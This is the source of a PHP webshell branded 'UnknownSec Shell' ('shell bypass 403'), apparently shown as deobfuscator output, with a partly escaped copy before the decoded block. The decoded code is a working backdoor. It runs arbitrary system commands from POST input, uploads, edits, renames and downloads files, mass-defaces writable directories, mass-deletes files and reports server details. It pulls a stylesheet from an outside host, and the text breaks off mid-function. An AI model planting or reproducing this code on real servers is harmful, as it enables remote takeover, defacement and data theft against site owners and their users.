\$_r>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\r\n\t\t\t<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='Isi file' \$_r ></textarea>\r\n\t\t\t<input class='btn btn-dark btn-sm btn-block' type='submit' name='bikin' value='buat'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'dirbaru'){\r\necho \"\$_s\";\r\nif(isset(\$_POST['buat'])){\r\n\t\$nama = \$_POST['nama_dir'];\r\n\tforeach (\$nama as \$nama_dir){\r\n\t\t\$folder = preg_replace(\"([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})\", '', \$nama_dir);\r\n\t\t\$fd = @mkdir (\$folder);\r\n\t}\r\n\tif(\$fd){\r\n\t\techo '<strong>Buat dir</strong> ok! '.ok().'</div>';\r\n\t} else {\r\n\t\techo '<strong>Buat dir</strong> gagal! '.er().'</div>';\r\n\t\t}\r\n\t}\r\necho \"\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<kbd>\$_x&nbsp;Buat dir</kbd>\r\n\t\t<form method='POST'>\r\n\t\t\t<i class='bi bi-folder'></i> Nama dir:\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' \$_r>\r\n\t\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='buat' value='buat'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'delete'){\r\necho \"\$_s\";\r\nfunction hapus_massal(\$dir,\$namafile) {\r\nif(is_writable(\$dir)) {\r\n\t\$dira = scandir(\$dir);\r\n\tforeach(\$dira as \$dirb) {\r\n\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\tif(\$dirb === '.') {\r\n\t\t\tif(file_exists(\"\$dir/\$namafile\")) {\r\n\t\t\t\tunlink(\"\$dir/\$namafile\");\r\n\t\t\t}\r\n\t\t} elseif(\$dirb === '..') {\r\n\t\t\tif(file_exists(\"\".dirname(\$dir).\"/\$namafile\")) {\r\n\t\t\t\tunlink(\"\".dirname(\$dir).\"/\$namafile\");\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\tif(file_exists(\$\xe2\x96\x9a)) {\r\n\t\t\t\t\t\techo \"[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;\$\xe2\x96\x9a<br>\";\r\n\t\t\t\t\t\tunlink(\$\xe2\x96\x9a);\r\n\t\t\t\t\t\t\$\xe2\x96\x9f = hapus_massal(\$dirc,\$namafile);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif(\$_POST['start']) {\r\n\thapus_massal(\$_POST['d_dir'], \$_POST['d_file']);\r\n\techo \"<br>\";\r\n}\r\necho \"\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<form method='POST'>\r\n\t\t<kbd>\$_x&nbsp;Mass delete</kbd>\r\n\t\t<br>\r\n\t\t<i class='bi bi-folder'></i> Lokasi:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='\$dir'>\r\n\t\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' \$_r><br>\r\n\t\t\t<div class='input-group-append'>\r\n\t\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='start' value='mass delete'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n\t}\r\n}\r\n// akhir tools\r\nif(isset(\$_GET['filesrc'])){\r\necho \"<br><b>name : </b>\".basename(\$_GET['filesrc']);\"</br>\";\r\necho '<div class=\"shell pre\" id=\"see\"><pre style=\"font-size:10px;\">'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre></div><br/>';\r\n} elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){\r\necho '<br><b>name : </b>'.basename(\$_POST['path']);'</br>';\r\n//rename file\r\nif(\$_POST['opt'] == 'rename'){\r\nif(isset(\$_POST['newname'])){\r\nif(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){\r\necho '<strong>Rename</strong> ok! '.ok().'</div>';\r\n\t} else {\r\necho '<strong>Rename</strong> gagal! '.er().'</div>';\r\n}\r\n\$_POST['name'] = \$_POST['newname'];\r\n}\r\necho '\r\n<form method=\"POST\">\r\n\t<div class=\"input-group mb-3\">\r\n\t\t<input class=\"form-control form-control-sm\" name=\"newname\" type=\"text\" value=\"'.\$_POST['name'].'\" />\r\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n\t\t<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"rename\"/>\r\n\t</div>\r\n</form>';\r\n} elseif(\$_POST['opt'] == 'edit'){\r\nif(isset(\$_POST['src'])){\r\n\$fp = fopen(\$_POST['path'],'w');\r\nif(fwrite(\$fp,\$_POST['src'])){\r\necho '<strong>Edit</strong> ok! '.ok().'</div>';\r\n\t} else {\r\necho '<strong>Edit</strong> gagal! '.er().'</div>';\r\n}\r\nfclose(\$fp);\r\n}\r\necho '\r\n<form method=\"POST\">\r\n\t<textarea class=\"form-control form-control-sm\" rows=\"7\" name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n\t\t<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n\t<input class=\"btn btn-outline-light btn-sm btn-block\" type=\"submit\" value=\"edit\"/>\r\n</form>\r\n<br>';\r\n\t}\r\n} else {\r\n//delete dir & file\r\nif(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){\r\nif(\$_POST['type'] == 'dir'){\r\nif(rmdir(\$_POST['path'])){\r\n\techo '<strong>Delete dir</strong> ok! '.ok().'</div>';\r\n\t} else {\r\n\techo '<strong>Delete dir</strong> gagal! '.er().'</div>';\r\n\t}\r\n} elseif(\$_POST['type'] == 'file'){\r\nif(unlink(\$_POST['path'])){\r\n\techo '<strong>Delete file</strong> ok! '.ok().'</div>';\r\n\t} else {\r\n\techo '<strong>Delete file</strong> gagal! '.er().'</div>';\r\n\t\t}\r\n\t}\r\n}\r\n\$scandir = scandir(\$path);\r\n\$pa = getcwd();\r\necho '<div class=\"table-responsive\">\r\n<table class=\"table table-hover table-dark text-light\">\r\n<thead>\r\n<tr>\r\n\t<td class=\"text-center\">name</td>\r\n\t\t<td class=\"text-center\">last edit</td>\r\n\t\t<td class=\"text-center\">size</td>\r\n\t\t<td class=\"text-center\">owner<gr>:</gr>downer</td>\r\n\t\t<td class=\"text-center\">permission</td>\r\n\t<td class=\"text-center\">options</td>\r\n</tr>\r\n</thead>\r\n<tbody class=\"text-nowrap\">\r\n<tr>\r\n\t<td><i class=\"bi bi-folder2-open\"></i><a class=\"text-decoration-none text-secondary\" href=\"?path='.dirname(\$dir).'\">..</a></td><td></td><td></td><td></td><td></td><td class=\"text-center\">\r\n\t\t<div class=\"btn-group\">\r\n\t\t\t<a class=\"btn btn-outline-light btn-sm\" href=\"?id=filebaru&path='.\$dir.'\"><i class=\"bi bi-file-earmark-plus-fill\"></i></a>\r\n\t\t\t<a class=\"btn btn-outline-light btn-sm\" href=\"?id=dirbaru&path='.\$dir.'\"><i class=\"bi bi-folder-plus\"></i></a>\r\n\t\t</div>\r\n\t</td>\r\n</tr>';\r\nforeach(\$scandir as \$dir){\r\n\$dt = date(\"Y-m-d H:i:s\", filemtime(\"\$path/\$dir\"));\r\n\tif(function_exists('posix_getpwuid')) {\r\n\t\t\$downer = @posix_getpwuid(fileowner(\"\$path/\$dir\"));\r\n\t\t\$downer = \$downer['name'];\r\n\t} else {\r\n\t\t\$downer = fileowner(\"\$path/\$dir\");\r\n\t}\r\n\tif(function_exists('posix_getgrgid')) {\r\n\t\t\$dgrp = @posix_getgrgid(filegroup(\"\$path/\$dir\"));\r\n\t\t\$dgrp = \$dgrp['name'];\r\n\t} else {\r\n\t\t\$dgrp = filegroup(\"\$path/\$dir\");\r\n\t}\r\nif(!is_dir(\"\$path/\$dir\") || \$dir == '.' || \$dir == '..') continue;\r\necho \"\r\n<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\\\"?path=\$path/\$dir\\\">\$dir</a></td>\r\n\t<td class='text-center'>\$dt</td>\r\n\t<td class='text-center'>dir</td>\r\n\t<td class='text-center'>\$downer<gr>:</gr>\$dgrp</td>\r\n\t<td class='text-center'>\";\r\nif(is_writable(\"\$path/\$dir\")) echo '<gr>';\r\nelseif(!is_readable(\"\$path/\$dir\")) echo '<rd>';\r\necho p(\"\$path/\$dir\");\r\nif(is_writable(\"\$path/\$dir\") || !is_readable(\"\$path/\$dir\")) echo '</gr></rd></td>';\r\necho \"\r\n\t<td class=\\\"text-center\\\">\r\n\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\r\n\t\t<div class=\\\"btn-group\\\">\r\n\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"rename\\\"><i class='bi bi-pencil-fill'></i></button>\r\n\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"delete\\\"><i class='bi bi-trash-fill'></i></button>\r\n\t\t</div>\r\n\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\r\n\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\r\n\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$dir\\\">\r\n\t</form>\r\n\t</td>\r\n</tr>\";\r\n}\r\nforeach(\$scandir as \$file){\r\n\$ft = date(\"Y-m-d H:i:s\", filemtime(\"\$path/\$file\"));\r\n\tif(!is_file(\$path.'/'.\$file)) continue;\r\n\tif(function_exists('posix_getpwuid')) {\r\n\t\t\$fowner = @posix_getpwuid(fileowner(\"\$path/\$file\"));\r\n\t\t\$fowner = \$fowner['name'];\r\n\t} else {\r\n\t\t\$fowner = fileowner(\"\$path/\$file\");\r\n\t}\r\n\tif(function_exists('posix_getgrgid')) {\r\n\t\t\$fgrp = @posix_getgrgid(filegroup(\"\$path/\$file\"));\r\n\t\t\$fgrp = \$fgrp['name'];\r\n\t} else {\r\n\t\t\$fgrp = filegroup(\"\$path/\$file\");\r\n\t}\r\necho \"\r\n<tr>\r\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a></td>\r\n\t<td class='text-center'>\$ft</td>\r\n\t<td class='text-center'>\".sz(filesize(\$file)).\"</td>\r\n\t<td class='text-center'>\$fowner<gr>:</gr>\$fgrp</td>\r\n\t<td class='text-center'>\";\r\nif(is_writable(\"\$path/\$file\")) echo '<gr>';\r\nelseif(!is_readable(\"\$path/\$file\")) echo '<rd>';\r\necho p(\"\$path/\$file\");\r\nif(is_writable(\"\$path/\$file\") || !is_readable(\"\$path/\$file\")) echo '</gr></rd></td>';\r\necho \"\r\n\t<td class=\\\"text-center\\\">\r\n\t\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\r\n\t\t\t<div class=\\\"btn-group\\\">\r\n\t\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"edit\\\"><i class='bi bi-pencil-square'></i></button>\r\n\t\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"rename\\\"><i class='bi bi-pencil-fill'></i></button>\r\n\t\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"download\\\"><i class='bi bi-download'></i></button>\r\n\t\t\t\t<button class=\\\"btn btn-outline-light btn-sm\\\" name=\\\"opt\\\" value=\\\"delete\\\"><i class='bi bi-trash-fill'></i></button>\r\n\t\t\t</div>\r\n\t\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\r\n\t\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\r\n\t\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$file\\\">\r\n\t\t</form>\r\n\t</td>\r\n</tr>\";\r\n\t}\r\n}\r\necho \"\r\n</tbody>\r\n</table>\r\n<div class='text-secondary'>&copy; \".date(\"Y\").\" \$_n</div>\r\n</div>\r\n</div>\r\n</body>\r\n</html>\";\r\n";
    eval /* PHPDeobfuscator eval output */ {
        date_default_timezone_set('Asia/Jakarta');
        $_n = 'UnknownSec';
        $_s = "<style>table{display:none;}</style><div class='table-responsive'><hr></div>";
        $_r = "required='required'";
        $_x = "<i class='bi bi-gear-fill'></i>";
        if (isset($_GET['option']) && $_POST['opt'] == 'download') {
            header('Content-type: text/plain');
            header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
            echo file_get_contents($_POST['path']);
            exit;
        }
        function ▟($dir, $p)
        {
            if (isset($_GET['path'])) {
                $▚ = $_GET['path'];
            } else {
                $▚ = getcwd();
            }
            if (is_writable($▚)) {
                return "<gr>" . $p . "</gr>";
            } else {
                return "<rd>" . $p . "</rd>";
            }
        }
        function ok()
        {
            echo "<div class=\"alert alert-success alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
        }
        function er()
        {
            echo "<div class=\"alert alert-danger alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
        }
        function sz($byt)
        {
            $sz = array('B', 'KB', 'MB', 'GB', 'TB');
            for ($i = 0; $byt >= 1024 && $i < count($sz) - 1; $byt /= 1024, $i++) {
            }
            return round($byt, 2) . " " . $sz[$i];
        }
        function ip()
        {
            $ipas = '';
            if (getenv('HTTP_CLIENT_IP')) {
                $ipas = getenv('HTTP_CLIENT_IP');
            } else {
                if (getenv('HTTP_X_FORWARDED_FOR')) {
                    $ipas = getenv('HTTP_X_FORWARDED_FOR');
                } else {
                    if (getenv('HTTP_X_FORWARDED')) {
                        $ipas = getenv('HTTP_X_FORWARDED');
                    } else {
                        if (getenv('HTTP_FORWARDED_FOR')) {
                            $ipas = getenv('HTTP_FORWARDED_FOR');
                        } else {
                            if (getenv('HTTP_FORWARDED')) {
                                $ipas = getenv('HTTP_FORWARDED');
                            } else {
                                if (getenv('REMOTE_ADDR')) {
                                    $ipas = getenv('REMOTE_ADDR');
                                } else {
                                    $ipas = 'IP tidak dikenali';
                                }
                            }
                        }
                    }
                }
            }
            return $ipas;
        }
        function p($file)
        {
            if ($p = @fileperms($file)) {
                $i = 'u';
                if (($p & 0xc000) == 0xc000) {
                    $i = 's';
                } elseif (($p & 0xa000) == 0xa000) {
                    $i = 'l';
                } elseif (($p & 0x8000) == 0x8000) {
                    $i = '-';
                } elseif (($p & 0x6000) == 0x6000) {
                    $i = 'b';
                } elseif (($p & 0x4000) == 0x4000) {
                    $i = 'd';
                } elseif (($p & 0x2000) == 0x2000) {
                    $i = 'c';
                } elseif (($p & 0x1000) == 0x1000) {
                    $i = 'p';
                }
                $i .= $p & 0400 ? 'r' : '-';
                $i .= $p & 0200 ? 'w' : '-';
                $i .= $p & 0100 ? 'x' : '-';
                $i .= $p & 040 ? 'r' : '-';
                $i .= $p & 020 ? 'w' : '-';
                $i .= $p & 010 ? 'x' : '-';
                $i .= $p & 04 ? 'r' : '-';
                $i .= $p & 02 ? 'w' : '-';
                $i .= $p & 01 ? 'x' : '-';
                return $i;
            } else {
                return "- ?? -";
            }
        }
        echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$_n}'>\r\n\t\t<meta name='robots' content='noindex,nofollow'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$_n}</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70'>\r\n\t\t<link rel='stylesheet' href='//random-php.ftp.sh/style.css'>\r\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\r\n\t\t<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\r\n\t\t<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n\t</head>\r\n<style>\r\n.shell {\r\n\tborder-radius: 4px;\r\n\tborder: 1px solid rgba(255, 255, 255, 0.4);\r\n\tfont-size: 10pt;\r\n\tdisplay: flex;\r\n\tflex-direction: column;\r\n\talign-items: stretch;\r\n\tbackground: #242424;\r\n\tcolor: #fff;\r\n}\r\n.pre {\r\n\theight: 500px;\r\n\toverflow: auto;\r\n\twhite-space: pre-wrap;\r\n\tflex-grow: 1;\r\n\tmargin:10px auto;\r\n\tpadding:10px;\r\n\tline-height:1.3em;\r\n\toverflow-x:scroll;\r\n}\r\n</style>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t\t<div class='corner text-secondary'>shell bypass 403</div>\r\n\t\t\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$_n} Shell</h4></a>";
        if (isset($_GET['path'])) {
            $path = $_GET['path'];
        } else {
            $path = getcwd();
        }
        $path = str_replace('\\', '/', $path);
        $paths = explode('/', $path);
        foreach ($paths as $id => $pat) {
            if ($pat == '' && $id == 0) {
                $a = true;
                echo "<div class=\"table-responsive\"><i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
                continue;
            }
            if ($pat == '') {
                continue;
            }
            echo "<a class=\"text-decoration-none\" href=\"?path=";
            for ($i = 0; $i <= $id; $i++) {
                echo "{$paths[$i]}";
                if ($i != $id) {
                    echo "/";
                }
            }
            echo '">' . $pat . '</a>/';
        }
        echo " [ " . ▟($path, p($path)) . " ]</div>";
        echo "\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<div class='container-fluid'>\r\n\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t<div class='text-center'>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=upload&path={$path}'><i class='bi bi-upload'></i> upload</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=deface&path={$path}'><i class='bi bi-exclamation-diamond'></i> mass deface</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=delete&path={$path}'><i class='bi bi-trash'></i> mass delete</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=cmd&path={$path}'><i class='bi bi-terminal'></i> console</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=info&path={$path}'><i class='bi bi-info-circle'></i> info server</a>\r\n\t\t</div>";
        // tools nya
        if (isset($_GET['path'])) {
            $dir = $_GET['path'];
            chdir($dir);
        } else {
            $dir = getcwd();
        }
        $dir = str_replace("\\", "/", $dir);
        $scdir = explode("/", $dir);
        for ($i = 0; $i <= $c_dir; $i++) {
            $scdir[$i];
            if ($i != $c_dir) {
            } elseif ($_GET['id'] == 'deface') {
                echo "{$_s}";
                function mass_kabeh($dir, $namafile, $isi_script)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $▚ = $dirc . '/' . $namafile;
                            if ($dirb === '.') {
                                file_put_contents($▚, $isi_script);
                            } elseif ($dirb === '..') {
                                file_put_contents($▚, $isi_script);
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$▚}<br>";
                                        file_put_contents($▚, $isi_script);
                                        $▟ = mass_kabeh($dirc, $namafile, $isi_script);
                                    }
                                }
                            }
                        }
                    }
                }
                function mass_biasa($dir, $namafile, $isi_script)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $▚ = $dirc . '/' . $namafile;
                            if ($dirb === '.') {
                                file_put_contents($▚, $isi_script);
                            } elseif ($dirb === '..') {
                                file_put_contents($▚, $isi_script);
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$dirb}/{$namafile}<br>";
                                        file_put_contents($▚, $isi_script);
                                    }
                                }
                            }
                        }
                    }
                }
                if ($_POST['start']) {
                    if ($_POST['tipe'] == 'massal') {
                        mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
                    } elseif ($_POST['tipe'] == 'biasa') {
                        mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
                    }
                    echo "<br>";
                }
                echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<form method='POST'>\r\n\t\t<kbd>{$_x}&nbsp;Mass deface</kbd>\r\n\t\t<br>Tipe:<br>\r\n\t\t<div class='custom-control custom-switch'>\r\n\t\t\t<input class='custom-control-input' type='checkbox' id='customSwitch' name='tipe' value='biasa'>\r\n\t\t\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n\t\t</div>\r\n\t\t<div class='custom-control custom-switch'>\r\n\t\t\t<input class='custom-control-input' type='checkbox' id='customSwitch1' name='tipe' value='massal'>\r\n\t\t\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n\t\t</div>\r\n\t\t\t<i class='bi bi-folder'></i> Lokasi:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\r\n\t\t\t<textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' {$_r}></textarea>\r\n\t\t\t<input class='btn btn-dark btn-sm btn-block' type='submit' name='start' value='mass deface'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'cmd') {
                if ($_POST['ekseCMD']) {
                    $cmd = $_POST['ekseCMD'];
                }
                echo "{$_s}\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t<kbd>{$_x}&nbsp;Console</kbd>\r\n\t\t<div class='container-fluid language-javascript'>\r\n\t\t\t<pre style='font-size:10px;'><gr>~</gr>\$&nbsp;<rd>{$cmd}</rd><br><code>";
                system($_POST['ekseCMD'] . ' 2>&1');
                echo "</code></pre>\r\n\t\t</div>\r\n\t\t<form method='POST'>\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control btn-sm' type='text' name='ekseCMD' value='{$cmd}' placeholder='whoami' {$_r}>\r\n\t\t\t\t<button class='btn btn-dark btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'info') {
                $disfunc = @ini_get("disable_functions");
                if (empty($disfunc)) {
                    $disfc = "<gr>NONE</gr>";
                } else {
                    $disfc = "<rd>{$disfunc}</rd>";
                }
                if (!function_exists('posix_getegid')) {
                    $user = @get_current_user();
                    $uid = @getmyuid();
                    $gid = @getmygid();
                    $group = "?";
                } else {
                    $uid = @posix_getpwuid(posix_geteuid());
                    $gid = @posix_getgrgid(posix_getegid());
                    $user = $uid['name'];
                    $uid = $uid['uid'];
                    $group = $gid['name'];
                    $gid = $gid['gid'];
                }
                $sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<rd>ON</rd>" : "<gr>OFF</gr>";
                echo "{$_s}\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t<kbd>{$_x}&nbsp;Info server</kbd>\r\n\t\t<br>\r\n\t\tUname: <gr>" . php_uname() . "</gr><br />\r\n\t\tSoftware: <gr>" . $_SERVER['SERVER_SOFTWARE'] . "</gr><br />\r\n\t\tPHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?id=phpinfo&path={$path}'>[ PHP INFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br />\r\n\t\tServer Ip: <gr>" . gethostbyname($_SERVER['HTTP_HOST']) . "</gr><br />\r\n\t\tYour Ip: <gr>" . ip() . "</gr><br />\r\n\t\tUser: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br />\r\n\t\tSafe Mode: {$sm}<br />\r\n\t\t<kbd>Disable Function:</kbd><pre>{$disfc}</pre>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'phpinfo') {
                @ob_start();
                @phpinfo();
                $buff = @ob_get_contents();
                @ob_end_clean();
                $awal = strpos($buff, "<body>") + 6;
                $akhir = strpos($buff, "</body>");
                echo "<pre class='php_info'>" . substr($buff, $awal, $akhir - $awal) . "</pre>";
                exit;
            } elseif ($_GET['id'] == 'upload') {
                echo "{$_s}\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>";
                if (isset($_FILES['file'])) {
                    if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
                        echo '<strong>Upload</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Upload</strong> gagal! ' . er() . '</div>';
                    }
                }
                echo "\r\n\t\t<form method='POST' enctype='multipart/form-data'>\r\n\t\t\t<kbd>{$_x}&nbsp;Upload File</kbd>\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control form-control-sm' type='file' name='file' {$_r}>\r\n\t\t\t\t<button class='btn btn-dark btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'filebaru') {
                echo "{$_s}";
                if (isset($_POST['bikin'])) {
                    $name = $_POST['nama_file'];
                    $isi_file = $_POST['isi_file'];
                    foreach ($name as $nama_file) {
                        $handle = @fopen("{$nama_file}", "w");
                        if ($isi_file) {
                            $buat = @fwrite($handle, $isi_file);
                        } else {
                            $buat = $handle;
                        }
                    }
                    if ($buat) {
                        echo '<strong>Buat file</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Buat file</strong> gagal! ' . er() . '</div>';
                    }
                }
                echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<kbd>{$_x}&nbsp;Buat file</kbd>\r\n\t\t<form method='POST'>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Nama file' {$_r}>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\r\n\t\t\t<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='Isi file' {$_r} ></textarea>\r\n\t\t\t<input class='btn btn-dark btn-sm btn-block' type='submit' name='bikin' value='buat'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'dirbaru') {
                echo "{$_s}";
                if (isset($_POST['buat'])) {
                    $nama = $_POST['nama_dir'];
                    foreach ($nama as $nama_dir) {
                        $folder = preg_replace("([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})", '', $nama_dir);
                        $fd = @mkdir($folder);
                    }
                    if ($fd) {
                        echo '<strong>Buat dir</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Buat dir</strong> gagal! ' . er() . '</div>';
                    }
                }
                echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<kbd>{$_x}&nbsp;Buat dir</kbd>\r\n\t\t<form method='POST'>\r\n\t\t\t<i class='bi bi-folder'></i> Nama dir:\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' {$_r}>\r\n\t\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='buat' value='buat'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";
            } elseif ($_GET['id'] == 'delete') {
                echo "{$_s}";
                function hapus_massal($dir, $namafile)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $▚ = $dirc . '/' . $namafile;
                            if ($dirb === '.') {
                                if (file_exists("{$dir}/{$namafile}")) {
                                    unlink("{$dir}/{$namafile}");
                                }
                            } elseif ($dirb === '..') {
                                if (file_exists("" . dirname($dir) . "/{$namafile}")) {
                                    unlink("" . dirname($dir) . "/{$namafile}");
                                }
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        if (file_exists($▚)) {
                                            echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$▚}<br>";
                                            unlink($▚);
